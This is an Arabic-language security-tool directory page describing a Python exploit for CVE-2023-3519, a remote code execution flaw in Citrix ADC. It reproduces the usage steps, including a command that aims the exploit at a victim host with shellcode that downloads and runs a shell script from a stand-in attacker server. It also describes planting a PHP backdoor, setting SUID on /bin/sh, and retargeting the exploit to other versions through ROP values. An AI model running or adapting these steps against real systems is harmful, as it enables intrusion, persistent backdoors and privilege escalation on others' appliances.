Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-3519 — استغلال Python لـ CVE-2023-3519 يستهدف Citrix ADC مع shellcode NASM مخصص، ونشر باب خلفي PHP، وتصعيد الامتيازات SUID. | Kitploit
أدوات/GitHubGitHub/passwa11/cve-2023-3519
تحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويبأداة الوصول عن بعدتطوير الحمولات
GitHubpasswa11/cve-2023-3519

CVE-2023-3519

استغلال Python لـ CVE-2023-3519 يستهدف Citrix ADC مع shellcode NASM مخصص، ونشر باب خلفي PHP، وتصعيد الامتيازات SUID.

عرض المستودع
11منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة RCE في Citrix ADC CVE-2023-3519

يستخدم هذا الاستغلال عناوين وشيلكود لإصدار Citrix VPX 13.1-48.47. للاطلاع على الشرح الكامل، انقر هنا.

الاستخدام

يلزم وجود NASM لبناء الشيلكود.

root@kitploit:~
$ sudo apt install nasm

الشيلكود المضمن سيقوم بتنزيل وتشغيل سكربت شل من خادم http(s) بعيد. يأخذ السكربت 3 وسائط: المضيف الهدف، المنفذ الهدف، وعنوان URL لحمولة سكربت شل. يتضمن هذا المستودع حمولة مثال تقوم بتشغيل id و uname -a قبل التنظيف الذاتي.

root@kitploit:~
$ echo 'id' > a
$ python3 -m http.server &
$ python3 cve-2023-3519.py victim.com 443 attack.er:8000/a

يجب أن يكون عنوان URL قصيرًا بما يكفي ليتسع في مخزن الشيلكود المؤقت، وستتلقى تحذيرًا إذا كان طويلًا جدًا.

آثار الشيلكود

سينشئ الشيلكود بابًا خلفيًا PHP في /var/netscaler/logon/a.php ويضبط بت SUID على /bin/sh. تُظهر حمولة sh المضمنة مثالًا على التنظيف التلقائي لهذه الآثار. لاحظ أيضًا أن الشيلكود لا يغلق واصفات الملفات الخاصة به، لذا قد يؤدي الاستغلال المتكرر المفرط إلى استنزاف الموارد.

التكيف مع الإصدارات الأخرى

بالنسبة لأهداف Citrix المستندة إلى FreeBSD، تحتاج فقط إلى إيجاد 3 قيم: إزاحة مؤشر الإرجاع المحفوظ، وأداة ROP jmp rsp (أو ما يعادلها، مثل push rsp; ret;)، والعنوان الذي يجب القفز إليه لتجنب الانهيار. هذه المعلمات جميعها مشفرة بالقرب من أعلى ملف cve-2023-3519.py.

تنزيل الأداة